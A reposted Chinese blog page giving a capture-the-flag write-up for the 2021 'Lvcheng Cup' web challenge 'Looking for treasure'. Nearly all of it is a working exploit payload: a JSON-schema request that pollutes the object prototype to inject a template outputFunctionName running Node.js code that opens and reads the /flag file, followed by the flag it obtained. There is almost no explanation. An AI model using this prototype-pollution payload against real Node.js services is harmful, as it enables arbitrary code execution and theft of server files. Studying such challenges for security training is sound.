当前位置:首页 » 《休闲阅读》 » 正文

2021年“绿城杯”网络安全大赛-Web-Looking for treasure_夜白君的博客

23 人参与  2022年02月14日 14:50  分类 : 《休闲阅读》  评论

点击全文阅读


2021年“绿城杯”网络安全大赛-Web-Looking for treasure

题目名称:Looking for treasure
题目内容:从中找到宝藏题目分值:200.0
题目难度:中等
相关附件:Looking for treasure的附件6.txt

解题思路:

1.原题直接附上payload

POST /validated/json-schema/validate
Content-Type: application/json
{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}

2.拿到flag

DASCTF{443a3172111bb28cd26f6eae1a90ea1a}

在这里插入图片描述


点击全文阅读


本文链接:http://zhangshiyu.com/post/34743.html

题目  附件  解题  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 全书浏览竹断相思情不知(陆清晚林逸舟)_竹断相思情不知(陆清晚林逸舟)全书结局
  • 被三个白眼狼哥哥背刺后,我成了太子妃他们悔疯了独家番外_太子妃苒苒周舒内容精选_小说后续在线阅读_无删减免费完结_
  • 班花成为高考状元后,两个竹马悔疯了后续更新+番外_媛媛陆东陆氏热门推荐_小说后续在线阅读_无删减免费完结_
  • 流光错系断蓬之舟+番外+后续(沈煜谢晚烟)全书浏览_流光错系断蓬之舟+番外+后续全书浏览
  • 热文推荐她用了整整三年去捂他那颗冰封的心叶晚妍楚泊辰:结局+番外精编之作
  • 童养媳为了白月光要虐我,没关系我还有九个下载列表_童养媳为了白月光要虐我,没关系我还有九个下载(崔明翰周云烟)
  • 折寒枝簪起霜思宋闻璟(沈棠眠宋闻璟)_折寒枝簪起霜思宋闻璟
  • 西风暮雪埋初心许梨疏霍子枭完结篇(西风暮雪埋初心)章节目录+章节前文(许梨疏霍子枭)全章无套路在线
  • 周漾之的后来我们各自悲欢速览周漾之林倦语全书在线
  • 童养媳为了白月光要虐我,没关系我还有九个在线(崔明翰周云烟)_童养媳为了白月光要虐我,没关系我还有九个在线
  • 重生后,我让贫困生身败名裂精彩分享_楚昭顾芊芊故事会_小说后续在线阅读_无删减免费完结_
  • 后来我们各自悲欢删减内容修复版本列表_后来我们各自悲欢删减内容修复版本(周漾之林倦语)

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1